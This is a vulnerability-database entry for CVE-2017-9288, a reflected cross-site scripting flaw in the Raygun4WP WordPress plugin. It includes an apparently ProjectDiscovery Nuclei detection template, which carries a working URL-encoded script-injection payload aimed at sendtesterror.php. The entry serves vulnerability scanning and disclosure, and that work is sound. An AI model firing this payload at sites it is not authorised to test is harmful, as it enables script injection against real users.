WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting

🗓️ 11 Jun 2026 03:33:20Reported by ProjectDiscoveryType

WordPress Raygun4WP 1.8.0 reflected cross-site scripting vulnerability via sendtesterror.ph

Reporter	Title	Published	Views	Family All 10
CNVD	WordPress Raygun4WP Plugin Cross-Site Scripting Vulnerability	2 Jun 201700:00	–	cnvd
CVE	CVE-2017-9288	29 May 201716:00	–	cve
Cvelist	CVE-2017-9288	29 May 201716:00	–	cvelist
EUVD	EUVD-2017-18224	7 Oct 202500:30	–	euvd
NVD	CVE-2017-9288	29 May 201716:29	–	nvd
Prion	Code injection	20 Aug 201916:15	–	prion
Prion	Cross site scripting	29 May 201716:29	–	prion
RedhatCVE	CVE-2017-18531	9 Jan 202610:32	–	redhatcve
wpexploit	Raygun4WP <= 1.8.0 - Unauthenticated Reflected XSS	7 Feb 201700:00	–	wpexploit
WPVulnDB	Raygun4WP <= 1.8.0 - Unauthenticated Reflected XSS	7 Feb 201700:00	–	wpvulndb

Source	Link
github	www.github.com/MindscapeHQ/raygun4wordpress/pull/17
github	www.github.com/MindscapeHQ/raygun4wordpress/issues/16
jgj212	www.jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html
nvd	www.nvd.nist.gov/vuln/detail/CVE-2017-9288
wpvulndb	www.wpvulndb.com/vulnerabilities/8836

id: CVE-2017-9288

info:
  name: WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Raygun4WP plugin (1.8.0 or higher) to mitigate this vulnerability.
  reference:
    - https://github.com/MindscapeHQ/raygun4wordpress/pull/17
    - https://github.com/MindscapeHQ/raygun4wordpress/issues/16
    - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9288
    - https://wpvulndb.com/vulnerabilities/8836
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-9288
    cwe-id: CWE-79
    epss-score: 0.02845
    epss-percentile: 0.86528
    cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: raygun
    product: raygun4wp
    framework: wordpress
  tags: cve2017,cve,wordpress,xss,wp-plugin,raygun,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Raygun4WP'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b535ed56575761827ce96b38cf556af7d88064ca2a7feaf28a4f0f5d529ad5430221008903d6fe1ad605839472529551ef4ad40b961b20d2928ee0db06b7cfbc6e8d56:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.1Medium risk

Vulners AI Score6.1

CVSS 24.3

CVSS 36.1

EPSS0.02845